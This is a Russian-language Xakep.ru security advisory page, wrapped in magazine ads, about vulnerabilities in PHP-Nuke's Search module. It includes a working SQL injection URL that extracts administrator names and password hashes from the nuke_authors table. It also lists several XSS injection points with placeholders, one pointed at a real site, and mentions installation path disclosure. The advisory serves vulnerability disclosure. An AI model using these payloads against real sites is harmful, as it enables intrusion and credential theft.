Продукты «Хакера»

  • Ежеквартальный «Хакер» #3

    Ежеквартальный «Хакер» #3

    Лучшие статьи квартала на бумаге

    2 000 ₽

    Заказать журнал
  • Годовая подписка на Xakep.ru

    Годовая подписка на Xakep.ru

    Полный доступ к статьям и архиву выпусков

    6 000 ₽ в год

    Подписаться
  • «Пентест WEB» для начинающих

    «Пентест WEB» для начинающих

    Совместный курс «Хакера» и лаборатории «Хаксет»

    7 000 ₽

    Купить курс
  • Спецвыпуск «Хакера» #4

    Спецвыпуск «Хакера» #4

    Лучшие статьи за 2021–2022 годы на бумаге

    2 000 ₽

    Заказать журнал

Программа: PHP-Nuke 

Несколько уязвимостей обнаружено в PHP-Nuke в 'Search' модуле. Удаленный пользователь может внедрить SQL команды. Удаленный пользователь может выполнить XSS нападение. Удаленный пользователь может также определить инсталляционный путь. 

1. SQL инъекция: 

http://localhost/nuke73/modules.php?name= Search&type=stories&query=f00bar&category=-1
&categ=%2 0and%201=2%20UNION%20SELECT% 200,0,aid,pwd,0,0,0,0,0,0%20from%
20nuke_authors/*

2. XSS: 

http://localhost/nuke73/modules.php?name= Search&sid=[xss code here]
http://localhost/nuke73/modules.php?name= Search&query=*&max=[xss code here]
http://localhost/nuke73/modules.php?name= Search&query=waraxe&sel1=[xss code here]&type=comments
http://localhost/nuke73/modules.php?name= Search&a=6&query=*&match=[xss code here]
http://www.nukecops.com/modules.php?name =Search&query=*&m od3=[xss code here]

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Старые
    Новые Популярные
    Межтекстовые Отзывы
    Посмотреть все комментарии